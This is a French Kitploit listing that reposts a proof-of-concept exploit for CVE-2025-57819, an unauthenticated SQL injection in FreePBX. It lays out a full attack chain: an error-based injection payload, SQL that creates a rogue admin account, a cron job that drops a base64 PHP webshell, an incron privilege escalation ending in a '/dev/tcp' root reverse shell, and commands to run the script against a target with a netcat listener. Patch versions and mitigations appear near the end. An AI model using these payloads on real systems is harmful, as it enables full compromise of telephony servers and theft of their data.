Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
FreePBX-SQLi-RCE — CVE-2025-57819 FreePBX SQLi RCE PoC | Kitploit
Outils/GitHubGitHub/jazztherabbit/freepbx-sqli-rce
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubjazztherabbit/freepbx-sqli-rce

FreePBX-SQLi-RCE

CVE-2025-57819 FreePBX SQLi RCE PoC

Voir le dépôt
7il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

FreePBX CVE-2025-57819 - PoC d'injection SQL non authentifiée menant à une RCE

Python License

Usage éducatif et recherche en sécurité uniquement - Voir l'avis juridique ci-dessous

Preuve de concept d'exploitation pour CVE-2025-57819, une vulnérabilité critique d'injection SQL non authentifiée dans FreePBX permettant l'exécution de code à distance. Ce PoC est publié après la publication des correctifs officiels à des fins exclusives de recherche en sécurité et de tests autorisés.

Aperçu

Les versions 15.x, 16.x et 17.x de FreePBX (antérieures aux versions corrigées) sont vulnérables à une injection SQL non authentifiée dans le gestionnaire AJAX du module endpoint. Cette chaîne de vulnérabilité permet :

  1. Créer des comptes administratifs via l'injection SQL
  2. Déployer des webshells via l'injection de tâches cron authentifiées
  3. Élever les privilèges jusqu'à root (si incron est disponible) via la chaîne de hooks sysadmin_manager
  4. Compromission totale du système avec accès par reverse shell

Détails de la vulnérabilité

Point de terminaison vulnérable

root@kitploit:~
GET /admin/ajax.php?brand=<PAYLOAD>

Le paramètre brand du gestionnaire AJAX du module endpoint accepte les entrées utilisateur sans validation, ce qui conduit à une injection SQL basée sur les erreurs.


Chaîne d'exploitation

Étape 1 : Injection SQL et création de compte administrateur

Vérifiez l'injection SQL à l'aide de l'extraction basée sur les erreurs EXTRACTVALUE() pour divulguer le nom de la base de données :

root@kitploit:~
x' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT DATABASE()),0x7e))-- -

Insérez un nouvel utilisateur administratif dans asterisk.ampusers :

root@kitploit:~
INSERT INTO ampusers (username, password_hash, admin) 
VALUES ('pbx_xxxxxxxx', '<MD5_HASH>', 1)

Étape 2 : Injection de tâches cron authentifiées

Avec des identifiants administrateur valides, l'exploit s'authentifie auprès de FreePBX et établit une session authentifiée. Les cookies de session sont enregistrés et utilisés pour toutes les requêtes authentifiées suivantes.

Injectez la commande du webshell dans asterisk.cron_jobs :

root@kitploit:~
INSERT INTO cron_jobs (modulename, jobname, command, class, schedule, max_runtime, enabled, execution_order)
VALUES ('sysadmin', 'wx', 'echo <BASE64_WEBSHELL>|base64 -d >/var/www/html/shell.php', NULL, '* * * * *', 30, 1, 1)

L'exécuteur cron de FreePBX exécute la commande en tant qu'utilisateur asterisk, déposant ainsi le webshell PHP.

Étape 3 : Activation du webshell

Le webshell PHP est déployé dans /var/www/html/shell.php :

root@kitploit:~
<?php system($_GET['cmd']); ?>

L'exploit interroge le webshell jusqu'à son activation, obtenant ainsi une RCE en tant qu'utilisateur asterisk (uid=999).

Étape 4 : Élévation de privilèges (conditionnelle)

Si incron est configuré sur la cible :

  1. Créez un fichier déclencheur dans /var/spool/asterisk/incron/
  2. incrond (exécuté en tant que root) détecte la création du fichier
  3. Invoque /usr/bin/sysadmin_manager avec le nom du fichier déclencheur
  4. sysadmin_manager valide la signature GPG et transmet au hook fwconsole-commands
  5. Le hook décode la charge utile et exécute : /usr/sbin/fwconsole <COMMAND>
  6. Injection de commande : help; bash -i >& /dev/tcp/LHOST/LPORT 0>&1

Résultat : shell root sur le listener reverse (si incron est disponible).


Ce qui est exploité

  • Absence de validation des entrées sur le paramètre brand
  • L'exécution de requêtes empilées permet la manipulation de la base de données
  • La table asterisk.cron_jobs inscriptible exécute des commandes en tant qu'asterisk
  • Persistance de session authentifiée via les cookies du compte administrateur créé
  • Surveillance du système de fichiers par incron exécuté en tant que root
  • Exécution de hook fwconsole non validée avec injection de commande

Installation

root@kitploit:~
git clone https://github.com/JazzTheRabbit/cve-2025-57819.git
cd cve-2025-57819
pip3 install requests
chmod +x JTR-CVE-2025-57819.py

Utilisation

root@kitploit:~
# Setup Netcat Listener
nc -lvnp <Listener Port>

# Run The Exploit
python3 JTR-CVE-2025-57819.py <TARGET_IP> <YOUR_IP> <PORT>

Preuve de concept

Capture d'écran du PoC


Versions affectées


Atténuation

Immédiat :

  • Restreignez l'accès à /admin/ajax.php depuis les réseaux non fiables
  • Désactivez incron si nécessaire : systemctl disable incrond

Définitif : Mettez à niveau vers les versions corrigées : 15.0.66+, 16.0.89+ ou 17.0.3+


Références

  • CVE-2025-57819
  • Catalogue KEV de la CISA
  • Avis de sécurité FreePBX

Avis juridique

⚠️ AVIS DE NON-RESPONSABILITÉ

Cette preuve de concept est fournie UNIQUEMENT À DES FINS DE TESTS DE SÉCURITÉ AUTORISÉS ET D'ÉDUCATION. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.

VOUS DEVEZ RESPECTER :

  • Le Computer Fraud and Abuse Act (CFAA) et les lois équivalentes de votre juridiction
  • Ne tester que les systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite
  • Obtenir une autorisation écrite avant tout test de sécurité
  • Les pratiques de divulgation responsable
  • Les réglementations sur la confidentialité et la protection des données (RGPD, CCPA, etc.)

UTILISATIONS INTERDITES :

  • Accès non autorisé à des systèmes informatiques
  • Tests d'intrusion sans consentement écrit
  • Perturbation de services ou vol de données
  • Toute activité malveillante ou illégale

EXONÉRATION DE RESPONSABILITÉ : L'auteur n'est pas responsable de :

  • Des accès non autorisés ou des poursuites pénales
  • Des dommages aux systèmes ou de la perte de données
  • Des conséquences juridiques d'une mauvaise utilisation
  • Des violations des lois sur la fraude informatique

Cette vulnérabilité est :

  • Divulguée publiquement (CVE-2025-57819)
  • Correctifs disponibles publiquement
  • Publiée à des fins de recherche en sécurité uniquement
  • Partagée de manière responsable après la publication des correctifs

Auteur

JazzTheRabbit

  • GitHub: @JazzTheRabbit
  • HackTheBox: @JazzTheRabbit
  • YouTube: JazzTheRabbit

Licence

Licence MIT

Télécharger l’outil
ID CVECVE-2025-57819
TypeInjection SQL non authentifiée (basée sur les erreurs)
CVSS9.8 / 10.0 (Critique)
Versions affectéesFreePBX 15 < 15.0.66, 16 < 16.0.89, 17 < 17.0.3
Versions corrigées15.0.66, 16.0.89, 17.0.3+
CISA KEVOui (29 août 2025)
VersionStatut
15.0.0 - 15.0.65Vulnérable
15.0.66+Corrigé
16.0.0 - 16.0.88Vulnérable
16.0.89+Corrigé
17.0.0 - 17.0.2Vulnérable
17.0.3+Corrigé